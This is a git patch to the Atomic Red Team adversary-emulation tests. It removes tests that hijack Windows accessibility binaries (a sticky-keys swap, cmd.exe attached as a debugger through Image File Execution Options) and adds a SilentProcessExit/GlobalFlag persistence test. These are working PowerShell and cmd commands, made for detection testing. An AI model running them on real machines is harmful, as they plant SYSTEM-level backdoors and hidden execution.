From 5067af06348b93415e347c65a2622ef459cdfeb8 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Fri, 9 Sep 2022 14:26:40 -0600 Subject: [PATCH] Added new T1546.012 (#2134) * Update T1546.008.yaml - https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit * Update T1546.012.yaml Added the same test but written in PowerShell. * Delete T1546.008.yaml Co-authored-by: Carrie Roberts --- atomics/T1546.008/T1546.008.yaml | 65 -------------------------------- atomics/T1546.012/T1546.012.yaml | 42 +++++++++++++++++++++ 2 files changed, 42 insertions(+), 65 deletions(-) delete mode 100644 atomics/T1546.008/T1546.008.yaml diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml deleted file mode 100644 index fda9c6b0..00000000 --- a/atomics/T1546.008/T1546.008.yaml +++ /dev/null @@ -1,65 +0,0 @@ -attack_technique: T1546.008 -display_name: 'Event Triggered Execution: Accessibility Features' -atomic_tests: -- name: Attaches Command Prompt as a Debugger to a List of Target Processes - auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 - description: | - Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. - - Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe. - supported_platforms: - - windows - input_arguments: - parent_list: - description: | - Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - type: String - default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe - attached_process: - description: | - Full path to process to attach to target in #{parent_list}. Default: cmd.exe - type: Path - default: C:\windows\system32\cmd.exe - executor: - command: | - $input_table = "#{parent_list}".split(",") - $Name = "Debugger" - $Value = "#{attached_process}" - Foreach ($item in $input_table){ - $item = $item.trim() - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - } - cleanup_command: | - $input_table = "#{parent_list}".split(",") - Foreach ($item in $input_table) - { - $item = $item.trim() - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null - } - name: powershell - elevation_required: true -- name: Replace binary of sticky keys - auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 - description: | - Replace sticky keys binary (sethc.exe) with cmd.exe - supported_platforms: - - windows - executor: - command: | - copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe - takeown /F C:\Windows\System32\sethc.exe /A - icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t - copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe - cleanup_command: | - copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - name: command_prompt - elevation_required: true diff --git a/atomics/T1546.012/T1546.012.yaml b/atomics/T1546.012/T1546.012.yaml index 6c8644e7..0c877d11 100644 --- a/atomics/T1546.012/T1546.012.yaml +++ b/atomics/T1546.012/T1546.012.yaml @@ -48,4 +48,46 @@ atomic_tests: reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1 reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1 name: command_prompt + elevation_required: true +- name: GlobalFlags in Image File Execution Options + description: | + The following Atomic Test will create a GlobalFlag key under Image File Execution Options, also a SilentProcessExit Key with ReportingMode and MonitorProcess values. This test is similar to a recent CanaryToken that will generate an EventCode 3000 in the Application log when a command, whoami.exe for example, is executed. + Upon running Whoami.exe, a command shell will spawn and start calc.exe based on the MonitorProcess value. + Upon successful execution, powershell will modify the registry and spawn calc.exe. An event 3000 will generate in the Application log. + supported_platforms: + - windows + input_arguments: + process: + description: | + Process to monitor + type: String + default: whoami.exe + cmd_to_run: + description: | + Command to execute + type: String + default: cmd.exe /c calc.exe + executor: + command: | + $Name = "GlobalFlag" + $Value = "512" + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}" + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType DWord -Force + $Name = "ReportingMode" + $Value = "1" + $SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}" + New-Item -Path $SilentProcessExit -Force + New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType DWord -Force + + $Name = "MonitorProcess" + $Value = "#{cmd_to_run}" + New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType String -Force + Start-Process whoami.exe + cleanup_command: | + $SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}" + Remove-Item $SilentProcessExit -force + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}" + Remove-Item $registryPath -force + name: powershell elevation_required: true \ No newline at end of file